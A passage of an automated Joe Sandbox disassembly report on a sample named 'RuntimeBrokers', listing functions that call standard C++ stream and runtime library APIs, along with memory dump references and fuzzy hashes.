                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$Gndec@?$basic_streambuf@
                                        • String ID:
                                        • API String ID: 2834487908-0
                                        • Opcode ID: 27c5c88bdad48b94d79aa3a8eea4f3b7da3df2ee0a68923ec8bdbc7aa4adac9e
                                        • Instruction ID: 911e643d789b3e706e0cbadf602acc96579dec664518554d1d7ee7ec895b5dc7
                                        • Opcode Fuzzy Hash: 27c5c88bdad48b94d79aa3a8eea4f3b7da3df2ee0a68923ec8bdbc7aa4adac9e
                                        • Instruction Fuzzy Hash: 381127303053005BCF100A3D94947ACBBEFAF46338BB50316E469C7AD2CB24F4568E50
                                        Function 6C0BEF41 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0BEF4B
                                          • Part of subcall function 6C0B30A0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(B33B76E5,?), ref: 6C0B30E3
                                          • Part of subcall function 6C0B30A0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,B33B76E5,?), ref: 6C0B3101
                                          • Part of subcall function 6C0B30A0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 6C0B312B
                                        • ?imbue@?$basic_ios@DU?$char_traits@D@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP140(?,?,00000002,00000001,000000C4,6C0B7EE4,?,?,0000007C,6C0B7EBA,?,?,?,?,?,00000008), ref: 6C0BEF8B
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP140(?,?,00000002,00000001,000000C4,6C0B7EE4,?,?,0000007C,6C0B7EBA,?,?,?,?,?,00000008), ref: 6C0BEFA1
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000002,00000001,000000C4,6C0B7EE4,?,?,0000007C,6C0B7EBA,?,?,?,?,?,00000008,6C0BCC88), ref: 6C0BEFB8
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,00000002,00000001,000000C4,6C0B7EE4,?,?,0000007C,6C0B7EBA,?,?,?,?,?,00000008,6C0BCC88), ref: 6C0BF00F
                                          • Part of subcall function 6C0B9D9D: __EH_prolog3.LIBCMT ref: 6C0B9DA4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??6?$basic_ostream@?imbue@?$basic_ios@Bios_base@std@@D@std@@@1@_H_prolog3H_prolog3_V01@V32@@V?$basic_streambuf@Vlocale@2@
                                        • String ID:
                                        • API String ID: 1745865538-0
                                        • Opcode ID: 6b2f0c70eca4ac64fc60d35d3d718c996dd4d1f319f9a8d313203f8cb557219d
                                        • Instruction ID: d391fa8c0f641b8db66a10b823e56745fdc4108bfb6bfea31718f3889d9e2467
                                        • Opcode Fuzzy Hash: 6b2f0c70eca4ac64fc60d35d3d718c996dd4d1f319f9a8d313203f8cb557219d
                                        • Instruction Fuzzy Hash: D8210B30A10258DFDF14DFA4C898BDCBBB8BF15308F144099E4097B682DBB66A48CF61
                                        Function 0049C25B Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0049C262
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0049C26C
                                          • Part of subcall function 00433E9D: std::_Lockit::_Lockit.LIBCPMT ref: 00433ED1
                                          • Part of subcall function 00433E9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00433EFF
                                        • std::_Facet_Register.LIBCPMT ref: 0049C2BD
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0049C2DD
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0049C2FB
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                        • String ID:
                                        • API String ID: 651022567-0
                                        • Opcode ID: 881741f80112333983a9dcf3e2bb77d925115a597ef7e981fe1e144dc401ffce
                                        • Instruction ID: 266cba6c7940d15e8794db09a10a2840038161d3aa6da1a27af1ea6bf29e9c69
                                        • Opcode Fuzzy Hash: 881741f80112333983a9dcf3e2bb77d925115a597ef7e981fe1e144dc401ffce
                                        • Instruction Fuzzy Hash: CB11A071900118DBCF11EBA5E845ABE7B75BF68314F24045EF812B7292CB389E05CB99
                                        Function 0049C3A7 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0049C3AE
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0049C3B8
                                          • Part of subcall function 00433E9D: std::_Lockit::_Lockit.LIBCPMT ref: 00433ED1
                                          • Part of subcall function 00433E9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00433EFF
                                        • std::_Facet_Register.LIBCPMT ref: 0049C409
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0049C429
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0049C447
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                        • String ID:
                                        • API String ID: 651022567-0
                                        • Opcode ID: 7e22e9d421bc995e9e000c3ae6e66f4f83a340d13433ba75e7ebdb5cb740e585
                                        • Instruction ID: e78058e8d510693287f225b943ae376ae080348733a48b9b651fbceec3243231
                                        • Opcode Fuzzy Hash: 7e22e9d421bc995e9e000c3ae6e66f4f83a340d13433ba75e7ebdb5cb740e585
                                        • Instruction Fuzzy Hash: 9E1102719006189BCF11EBA5D886AFE7BB4BF54318F24001EF810BB292CB389E05C799
                                        Function 0049C599 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0049C5A0
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0049C5AA
                                          • Part of subcall function 00433E9D: std::_Lockit::_Lockit.LIBCPMT ref: 00433ED1
                                          • Part of subcall function 00433E9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00433EFF
                                        • std::_Facet_Register.LIBCPMT ref: 0049C5FB
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0049C61B
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0049C639
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                        • String ID:
                                        • API String ID: 651022567-0
                                        • Opcode ID: b353ab310e5c3620580b011c75fd436d552d1267279de50548e2dd2030600ff9
                                        • Instruction ID: 98499343fe29cf1280e6b3835e483d149863216e49c721828bbc66e5afaad8d9
                                        • Opcode Fuzzy Hash: b353ab310e5c3620580b011c75fd436d552d1267279de50548e2dd2030600ff9
                                        • Instruction Fuzzy Hash: 4711C6719001149BCF11EBA5D845AFE7B75BF58315F25041EF410B7292CF38DE058B99
                                        Function 6C14A69C Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C14A6A6
                                          • Part of subcall function 6C14A36F: __EH_prolog3.LIBCMT ref: 6C14A376
                                          • Part of subcall function 6C14A36F: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6C14A6BF,?,00000003,00000001,000000B8), ref: 6C14A39A
                                          • Part of subcall function 6C14A36F: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,6C14A6BF,?,00000003,00000001,000000B8), ref: 6C14A3B3
                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAG@Z.MSVCP140(?,?,00000003,00000001,000000B8), ref: 6C14A6CD
                                        • ?fail@ios_base@std@@QBE_NXZ.MSVCP140 ref: 6C14A6DC
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C14A728
                                          • Part of subcall function 6C14A2A3: __EH_prolog3_catch.LIBCMT ref: 6C14A2AA
                                          • Part of subcall function 6C14A2A3: ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,00000000,00000014,6C14A6F6,?,?), ref: 6C14A2D6
                                          • Part of subcall function 6C14A2A3: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,00000000,00000014,6C14A6F6,?,?), ref: 6C14A327
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 6C14A701
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??5?$basic_istream@?fail@ios_base@std@@?sbumpc@?$basic_streambuf@?setstate@?$basic_ios@Bios_base@std@@D@std@@@1@@H_prolog3_catchV01@V?$basic_streambuf@
                                        • String ID:
                                        • API String ID: 2886180661-0
                                        • Opcode ID: 0da712103725313fa4fa04b4beb0abb26a4affaf0f188ff0a6b2db0b6eda77d8
                                        • Instruction ID: 336cbe784c2c04cc537830a811133bf131e0a2ccd60837269f05cfdd1e8702a2
                                        • Opcode Fuzzy Hash: 0da712103725313fa4fa04b4beb0abb26a4affaf0f188ff0a6b2db0b6eda77d8
                                        • Instruction Fuzzy Hash: D5117C38B001089FDB24DFA4D994BED73B9EF11308F5081A8E11AA77A0DB34AE09CF10
                                        Function 6C1278B3 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C1278BD
                                          • Part of subcall function 6C0B30A0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(B33B76E5,?), ref: 6C0B30E3
                                          • Part of subcall function 6C0B30A0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,B33B76E5,?), ref: 6C0B3101
                                          • Part of subcall function 6C0B30A0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 6C0B312B
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAVios_base@1@AAV21@@Z@Z.MSVCP140(6C0B0520,00000002,00000001,000000AC,6C15CF14,?,6C3EB60C,00000000,?), ref: 6C1278E9
                                        • ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000002,00000000), ref: 6C1278F9
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP140(00000002), ref: 6C127919
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?), ref: 6C127949
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@V01@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@?setw@std@@D@std@@@1@_H_prolog3J@1@_Smanip@_U?$_V21@@V?$basic_streambuf@Vios_base@1@
                                        • String ID:
                                        • API String ID: 2948014658-0
                                        • Opcode ID: 701df07de121cc92b0f0e7a64b13c38da218b419e0a31b8da0c6e07ab2938a08
                                        • Instruction ID: 3dac59ca6fa21f9662710820486df302cfa1571234ad062ac098c2d994eb3dc7
                                        • Opcode Fuzzy Hash: 701df07de121cc92b0f0e7a64b13c38da218b419e0a31b8da0c6e07ab2938a08
                                        • Instruction Fuzzy Hash: 2A11C871A102549BDB14DBA0CC58FEEBBB8AF55308F404098E1096B691DF756E49CBA2
                                        Function 6C12F939 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C12F940
                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C439598,00000004), ref: 6C12F950
                                        • GetModuleHandleA.KERNEL32(00000000,00000004), ref: 6C12F95B
                                        • GetModuleFileNameA.KERNEL32(00000000,6C439598,00000104), ref: 6C12F968
                                        • _mbsrchr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(6C439598,0000005C), ref: 6C12F971
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Module$FileH_prolog3HandleName_mbsrchrstrlen
                                        • String ID:
                                        • API String ID: 3308004774-0
                                        • Opcode ID: 667609971eb57678b4cf66576c346a018f1bbaf527ac7927ec14889e0af02f2d
                                        • Instruction ID: 58158ca919a7cae9f0363319a372c609f431e12566f7a0eb9620fe677ace6e84
                                        • Opcode Fuzzy Hash: 667609971eb57678b4cf66576c346a018f1bbaf527ac7927ec14889e0af02f2d
                                        • Instruction Fuzzy Hash: F2017BB13043429FEF084FB48854BEEBB78AF62718F10050DF5419BB81C7B989458B60
                                        Function 6C15E7CD Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C15E7D7
                                          • Part of subcall function 6C0C51EA: __EH_prolog3.LIBCMT ref: 6C0C51F1
                                          • Part of subcall function 6C0C51EA: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C5215
                                          • Part of subcall function 6C0C51EA: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C522E
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@H@Z.MSVCP140(?,00000003,00000001,000000B0,6C14E324,?,?,0000003C,?,6C3DD48C,6C431E98,6C431D38), ref: 6C15E7FC
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 6C15E80B
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C15E84A
                                          • Part of subcall function 6C0C46DC: __EH_prolog3_catch.LIBCMT ref: 6C0C46E3
                                          • Part of subcall function 6C0C46DC: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP140(?,?,00000000,0000004C,6C0C7CDC,?,?,?,?,?,?,00000004), ref: 6C0C4716
                                          • Part of subcall function 6C0C46DC: ?width@ios_base@std@@QBE_JXZ.MSVCP140(00000000,?,?,?,?,00000004), ref: 6C0C4749
                                          • Part of subcall function 6C0C46DC: ?width@ios_base@std@@QBE_JXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 6C0C477D
                                          • Part of subcall function 6C0C46DC: ?width@ios_base@std@@QBE_JXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 6C0C4793
                                          • Part of subcall function 6C0C46DC: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140 ref: 6C0C47CB
                                          • Part of subcall function 6C0C46DC: ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,?,00000000,0000004C,6C0C7CDC,?,?,?,?,?,?,00000004), ref: 6C0C4852
                                          • Part of subcall function 6C0C46DC: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,?,?,?,00000004), ref: 6C0C486A
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 6C15E82F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??6?$basic_ostream@?getloc@ios_base@std@@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@D@std@@@1@@H_prolog3_catchV01@V?$basic_streambuf@Vlocale@2@
                                        • String ID:
                                        • API String ID: 1469493847-0
                                        • Opcode ID: 181dda4152d1439ad399a477453a9c24b68d69c360b18a12d515164eac02600d
                                        • Instruction ID: becb464b4f1ceb1177fb6ed0e1720d167faccea701838cd03fc23bcb9120dffc
                                        • Opcode Fuzzy Hash: 181dda4152d1439ad399a477453a9c24b68d69c360b18a12d515164eac02600d
                                        • Instruction Fuzzy Hash: 1A0140347002089FDF18DFA4C998BDC77B9AF15308F148198E45A976A1DF34AE59CA11
                                        Function 6C15E5A9 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C15E5B3
                                          • Part of subcall function 6C0C51EA: __EH_prolog3.LIBCMT ref: 6C0C51F1
                                          • Part of subcall function 6C0C51EA: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C5215
                                          • Part of subcall function 6C0C51EA: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C522E
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140(00000003,00000001,000000B0,6C14E267,?,00000000), ref: 6C15E5E7
                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAH@Z.MSVCP140(?), ref: 6C15E5FA
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 6C15E609
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C15E624
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??5?$basic_istream@D@std@@@1@@V01@V?$basic_streambuf@
                                        • String ID:
                                        • API String ID: 288696274-0
                                        • Opcode ID: 0c87df9b108c1c76d3c3718f8fbc9cba888bf3e2906e9dd2dae6858187a7f568
                                        • Instruction ID: 648efed16f7b9ffb14275c78b73d7fb71ae48e510496e0ab72dd4ca846992edd
                                        • Opcode Fuzzy Hash: 0c87df9b108c1c76d3c3718f8fbc9cba888bf3e2906e9dd2dae6858187a7f568
                                        • Instruction Fuzzy Hash: F70171347002089FDF18DFA0D998BDD77B9EF51308F508198E45A972A1DF34AE0ACB11
                                        Function 6C1765E3 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C1765ED
                                          • Part of subcall function 6C0C51EA: __EH_prolog3.LIBCMT ref: 6C0C51F1
                                          • Part of subcall function 6C0C51EA: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C5215
                                          • Part of subcall function 6C0C51EA: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C522E
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140(00000003,00000001,000000B0,6C175D3D,?,00000000,?,?,?,6C176215,?), ref: 6C176621
                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAG@Z.MSVCP140(6C176215,?,?,?,6C176215,?), ref: 6C176634
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140(?,?,?,6C176215,?), ref: 6C176643
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?,6C176215,?), ref: 6C17665E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
